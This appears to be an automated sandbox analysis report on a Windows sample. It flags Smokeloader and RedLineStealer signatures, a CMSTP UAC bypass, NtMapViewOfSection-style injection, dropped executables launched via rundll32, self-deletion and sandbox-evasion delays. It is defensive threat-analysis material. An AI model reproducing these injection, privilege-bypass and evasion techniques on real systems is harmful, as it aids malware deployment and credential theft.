            Source: 12.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 7.2.EBC4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.389281355.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000007.00000002.490026544.00000000007D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000005.00000002.465675334.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000C.00000002.508127719.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000000.00000002.389150563.00000000007D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000004.00000002.439838809.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.439756296.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000007.00000002.491094489.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000000C.00000002.507936958.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000005.00000002.464999094.00000000023E8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F0250_2_0040F025
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004170DC0_2_004170DC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138E80_2_004138E8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413E2C0_2_00413E2C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C6350_2_0040C635
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004143700_2_00414370
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040F0254_2_0040F025
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004170DC4_2_004170DC
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004138E84_2_004138E8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00413E2C4_2_00413E2C
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040C6354_2_0040C635
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004143704_2_00414370
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004157C94_2_004157C9
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F75ED5_2_004F75ED
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004BC1BB5_2_004BC1BB
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F12205_2_004F1220
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004A76415_2_004A7641
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_005067605_2_00506760
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B37845_2_004B3784
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F081F5_2_004F081F
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004D6A7B5_2_004D6A7B
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0049BC945_2_0049BC94
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004013D8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401407 NtAllocateVirtualMemory,0_2_00401407
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DD
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013E3 NtAllocateVirtualMemory,0_2_004013E3
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013F6 NtAllocateVirtualMemory,0_2_004013F6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013FE NtAllocateVirtualMemory,0_2_004013FE
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014A8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014B3
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014BF
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013D8 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004013D8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00401407 NtAllocateVirtualMemory,4_2_00401407
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014DA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DA
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014DD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014DD
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013E3 NtAllocateVirtualMemory,4_2_004013E3
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013F6 NtAllocateVirtualMemory,4_2_004013F6
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004013FE NtAllocateVirtualMemory,4_2_004013FE
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014A8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014A8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014B3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B3
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014BF
            Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: B87E.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: EBC4.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: gfgsrbs.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp 3D63AD175A34E4C89EA6ECA4A1161BB5DD514A5E58302707EDC03473EB1F656E
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gfgsrbs C:\Users\user\AppData\Roaming\gfgsrbs
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exe
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe "C:\Users\user\AppData\Local\Temp\EBC4.exe"
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B87E.exe C:\Users\user\AppData\Local\Temp\B87E.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EBC4.exe C:\Users\user\AppData\Local\Temp\EBC4.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",WorhdhqfpryrJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B87E.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@9/5@35/10
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B8E86 CreateToolhelp32Snapshot,5_2_004B8E86
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp",Worhdhqfpryr
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
            Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

            Data Obfuscation

            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\gfgsrbsUnpacked PE file: 4.2.gfgsrbs.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F47 push eax; ret 0_2_00402F82
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F7D push eax; ret 0_2_00402F82
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402183 push ecx; iretd 0_2_004024FA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B4C1 push ecx; ret 0_2_0040B4D4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FE12 pushfd ; retn 0042h0_2_0040FE19
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402F47 push eax; ret 4_2_00402F82
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402F7D push eax; ret 4_2_00402F82
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402183 push ecx; iretd 4_2_004024FA
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040B4C1 push ecx; ret 4_2_0040B4D4
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040FE12 pushfd ; retn 0042h4_2_0040FE19
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_005002EA push edx; ret 5_2_00500312
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FD4B6 push 004C035Dh; ret 5_2_004FD5A8
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004705D7 push 00469469h; ret 5_2_00470B5E
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B4A9B push dword ptr [0050A270h]; ret 5_2_004B4D20
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046DB68 push 00468D9Fh; ret 5_2_0046DD21
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F5B91 push 0046744Ah; ret 5_2_004F5CE6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F7C82 push 004DE9FCh; ret 5_2_004F7D09
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AFD42 push dword ptr [00509C28h]; ret 5_2_004B0451
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FCD16 push 004C6FD6h; ret 5_2_004FCF23
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004E0DEB push 004C2A98h; ret 5_2_004E11D5
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046CE82 push 00469BBCh; ret 5_2_0046CF3C
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B0FC1 push 00469BBCh; ret 5_2_004B0FE7
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_00501FF9 push 004C3C47h; ret 5_2_005021F6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0047E041 push 00468197h; ret 5_2_0047E22C
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004BE04C push 00469D4Eh; ret 5_2_004BE091
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046A04E push 0046624Ah; ret 5_2_0046A3CD
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FA045 push 004EF3F6h; ret 5_2_004FA064
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046B049 push dword ptr [0050A068h]; ret 5_2_0046B0E6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004DC054 push 004C3B4Eh; ret 5_2_004DC143
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AD068 push 0046744Ah; ret 5_2_004AD259
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AF06F push 00469469h; ret 5_2_004AF084
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gfgsrbs
            Source: C:\Users\user\AppData\Local\Temp\B87E.exe File created: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B87E.exe
            Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EBC4.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe
            Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gfgsrbs:Zone.Identifier read attributes | delete
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbs Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\explorer.exe TID: 5148 Thread sleep count: 640 > 30
            Source: C:\Windows\explorer.exe TID: 5112 Thread sleep count: 1133 > 30
            Source: C:\Windows\explorer.exe TID: 5112 Thread sleep time: -113300s >= -30000s
            Source: C:\Windows\explorer.exe TID: 412 Thread sleep count: 1284 > 30
            Source: C:\Windows\explorer.exe TID: 412 Thread sleep time: -128400s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4848 Thread sleep count: 507 > 30
            Source: C:\Windows\explorer.exe TID: 3836 Thread sleep count: 1067 > 30
            Source: C:\Windows\explorer.exe TID: 3836 Thread sleep time: -106700s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4136 Thread sleep count: 1183 > 30
            Source: C:\Windows\explorer.exe TID: 4136 Thread sleep time: -118300s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe TID: 3004 Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe Thread delayed: delay time: 600000
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 640
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1133
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1284
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 507
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1067
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1183
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe File opened: PHYSICALDRIVE0
            Source: C:\Users\user\AppData\Local\Temp\B87E.exe API coverage: 7.4 %
            Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 136000
            Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
